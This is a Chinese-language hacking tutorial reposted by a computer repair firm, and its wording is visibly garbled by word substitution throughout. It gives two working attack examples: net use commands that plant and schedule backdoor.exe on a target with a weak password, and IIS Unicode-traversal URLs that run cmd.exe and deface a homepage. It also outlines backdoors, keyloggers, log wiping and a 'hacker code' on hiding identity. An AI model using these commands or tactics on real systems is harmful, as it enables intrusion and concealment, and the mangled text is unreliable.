网络攻防教程
声明:
本教程统统触及攻击方面的方法及实例目标为了相识毛病隐患,以便我们针对不同的毛病做好宁静防范。大家不要利用这些攻击方法去任意破坏他人的体系及网络。
概述
信息和网络宁静技术颠末近十年的生长,在深度和广度上曾经有了很大的进步,其中一个重要的研究趋向便是看重攻、防结合,追求静态宁静。
教程内容
相识体系及网络的不宁静隐患
相识体系毛病的原理及伤害性
攻击本领及工具的使用
如何利用毛病进行体系攻击
如何利用毛病进行网络攻击
对软件毛病的攻击及软件的破解
如何防备恶意攻击
如何构建宁静的体系和网络情况
引子
深入相识体系毛病及办理毛病带来的伤害性。
例1 (弱口令毛病攻击) 目标:相识办理毛病带来的危害。 net use \\xxx.xxx.xxx.xxx\ipc$ password /user:admin copy backdoor.exe \\xxx.xxx.xxx.xxx\admin$\system32 net time \\xxx.xxx.xxx.xxx at \\xxx.xxx.xxx.xxx 23:00 backdoor.exe
例2 (Unicode毛病攻击) 目标:相识体系毛病带来的危害http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:>http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+sethttp://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+iamhacker+>;;;c:\inetpub\wwwroot\index. htm
黑客界说的争议
什么是黑客?
黑客其实是Hacker的音译,源于动词Hack其引申意义是指“干了一件非常漂亮的事”。在这里我们说黑客是指那些精于某方面技术的人。对于计算机而言,黑客便是醒目网络、体系、外设以及软硬件技术的人。
什么是骇客? 有些黑客跨越标准,运用自己的知识去做出有损他人权益的事变,我们就称这种人为骇客(Cracker,破坏者)。
黑客精力
“Free”(自在、收费)的精力
探究与创新的精力 全部的黑客都是喜欢探究软件程序秘密的人。他们探究程序与体系的毛病,在发现问题的同时会提出解决问题的方法。
反传统的精力
合作的精力
黑客守则(守则有许多版本,整理为12条)
不要恶意破坏任何的体系,这样做只会给你带来贫苦。
不要破坏他人的软件和资料。
不要修正任何体系文件,要是是因为进入体系的必要而修正了体系文件,请在目标达到后将他改回原状。
不要方便的将你要黑的或者黑过的站点告诉你不信托的朋友。
在发表黑客文章时不要用你的真实名字。
正在入侵的时间,不要随意离开你的电脑。
不要入侵或破坏当局构造的主机。
将你的笔记放在宁静的地方。
已侵入的电脑中的账号不得清除或修正。
可以为隐蔽自己的侵入而作一些修正,但要只管即便保持原体系的宁静性,不能因为失掉体系的控制权而将门户大开。
不要做一些无聊、单调并且愚笨的反复性事变。
做真正的黑客,读遍全部管一体系宁静或体系毛病的书。
为什么会有攻击?
帮助体系办理员查察体系毛病
位子你的私家恩仇而攻击
商业或小我私家目标获得秘密资料
民族仇恨
利用对方的体系资源餍足自己的需求
寻求安慰
无目标攻击
攻击前的准备事变
隐蔽自己的IP
攻击的途径
针对端口攻击
针对服务攻击
针对第三方软件攻击
DOS攻击
针对体系攻击
口令攻击
诱骗
攻击的过程(进攻四部曲)
踩点扫描 主动的侦察(监听) 主动的侦察
获得体系或办理员权限
保持拜访
在网络中隐身 清除脚印
踩点
什么是踩点?
踩点便是通过种种途径对所要攻击的目标进行多方面的相识 (包括任何可失掉的蛛丝马迹,但要确保信息的正确)。
踩点的方法
域名及其注册机构的盘问
公司性质的相识
对主页进行分析
邮件地点的搜集
目标IP地点范畴盘问
主动的侦察(扫描)
扫描的目标
扫描的目标便是利用种种工具在攻击目标的IP地点或地点段的主机上寻找毛病。
扫描的原理
扫描是采取模拟攻击的情势对目标大概存在的已知宁静毛病逐项进行查抄,目标可以是事变站、服务器、互换机、路由器、数据库应用等对象。凭据扫描结果向扫描者或办理员提供周到可靠的分析陈诉。
主动的侦察(嗅探监听)
背景
网络嗅探监听本来是网络办理员使用一类办理工具,监视网络的状态、数据的活动、以及网络上传输的信息。但这类工具也常被黑客所使用,以此获得网络上传输的敏感信息。监听结果最好的地方是网关、路由器、防火墙之类信息聚集的设备处。
嗅探监听的原理
以太网协议的事变方式:
为将要发送的数据包发往全部的连在一同的主机,也便是广播,在报头中包罗目标机的精确地点。因而只要与数据包中目标地点一致的那台主机才会吸收数据包,其他的呆板都会将包丢弃。但是,当主机事变在监听模式下时,无论吸收到的数据包中目标地点是什么,主机都将其吸收下来。 一个合法的网络接口应相应的数据帧:
帧的目标区域具有和当地网络接口相立室的硬件地点; 帧的目标区域具有“广播地点”; 网络接口在吸收到上面这两种数据包时,NC(Numerical Control, 数字计算机控制)通过CPU产生一个硬件停止,该停止使操作体系将帧中所包罗的数据传送给体系进一步处理。监听软件便是能使当地NC处于混杂状态,这时NC具备“广播地点”所以对全部吸收的帧都产生一个硬件停止。 注释: 一台计算机只能监听颠末自己网络接口的数据包,不能监听不在统一网段的计算机传输的信息。
网络嗅探监听的检测
检测的难度
运转网络监听的主机只是主动的吸收数据,并没有主动的行动,既不会与其他主机互换信息,也不能修正网上传输的信息包。这决议了网络监听检测是非常困难的。
解决办法
运转监听软件的主机体系因为负荷过重,因而对外界的相应缓慢。 对怀疑运转监听程序的主机,用精确的ip地点和错误的物理地点去ping,要是运转了监听程序该机会有相应。因为正常的呆板不担当错误的物理地点,处于监听状态的主机会担当。
如何获得体系或办理员权限
获得体系及办理员权限的目标
连接到长途计算机,对他进行控制,达到自己的攻击目标。
获得体系及办理员权限的方法
通过体系毛病获得体系权限。
通过办理毛病获得办理员权限。
通过软件毛病失掉体系权限。
通过监听获得敏感信息进一步获得相应权限。
通过弱口令获得长途办理员的用户密码。
通过穷举法获得长途办理员的用户密码。
通过攻破与目标机有信托干系另一台呆板进而失掉目标机的控制权。
通过诱骗获得权限。
其他有效的方法。
长期保持对攻击目标的控制
后门
入侵者的末了一招便是在受侵害的体系上创造一些机会以便日后东山再起,并盼望能假装成办理员----莳植后门或木马。
后门的品种许多
网页后门
Telnet后门
账号后门
木马
体系后门
击键记载后门
攻击之后的事变(掩饰笼罩踪迹)
清除变乱查看器日记
清除IIS、中端服务日记
隐蔽文件
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
评论加载中...
|